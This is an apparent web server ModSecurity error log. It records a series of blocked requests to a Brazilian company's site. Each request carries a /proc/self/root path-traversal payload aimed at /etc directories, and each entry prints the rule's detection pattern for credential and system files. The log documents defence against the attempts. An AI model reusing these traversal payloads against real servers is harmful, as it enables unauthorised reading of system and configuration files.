[Tue Mar 17 08:53:46.025271 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.46:54878] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAyqBJNF7axNlVR0X4QwAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:53:48.442244 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.241.46:46406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAzO82sZHvlq4xgHq-HQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:11.720332 2026] [:error] [pid 2305:tid 140411632822016] [client 74.7.241.46:51648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA4wQohV2v-7oj5HH2GgAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:54:13.147495 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.241.46:45492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA5QeiSKl8TjouI-b9NgAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:19.242741 2026] [:error] [pid 7000:tid 140411649607424] [client 74.7.241.46:45498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA6xePVOt35XCGZP8rGAAAA4s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:20.485070 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.241.46:42392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA7AQohV2v-7oj5HH2HAAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:22.906455 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.243.203:40254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA7geiSKl8TjouI-b9PwAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:24.220557 2026] [:error] [pid 1210:tid 140411658000128] [client 74.7.243.203:33594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA8FKJy4A1bGlmj9BQXAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:25.555000 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:33602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA8e82sZHvlq4xgHq-KAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:26.715821 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.243.203:33606] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA8qBJNF7axNlVR0X4UAAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:28.053924 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.243.203:33622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA9JqmL8PQht4WJFlCdQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:30.431436 2026] [:error] [pid 1961:tid 140411699963648] [client 74.7.243.203:33636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA9nRXaaWotPICgYsf2gAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:31.795352 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.243.203:46072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA9weiSKl8TjouI-b9QQAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:33.107807 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:46088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA-aBJNF7axNlVR0X4VQAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:36.391830 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.243.203:46098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA_O82sZHvlq4xgHq-LAAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:37.716609 2026] [:error] [pid 1016:tid 140411649607424] [client 74.7.243.203:46104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA_ZqmL8PQht4WJFlCewAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:39.011876 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.243.203:46110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA_5DEJR9VXonE_-1JJAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:39.078636 2026] [:error] [pid 1210:tid 140411666392832] [client 74.7.241.46:42404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablA_1KJy4A1bGlmj9BQagAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:54:40.404882 2026] [:error] [pid 7000:tid 140411716749056] [client 74.7.243.203:56400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBABePVOt35XCGZP8rGwAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:41.717942 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.243.203:56414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBAe82sZHvlq4xgHq-LQAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:43.119734 2026] [:error] [pid 2305:tid 140411590858496] [client 74.7.243.203:56418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBAwQohV2v-7oj5HH2HgAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
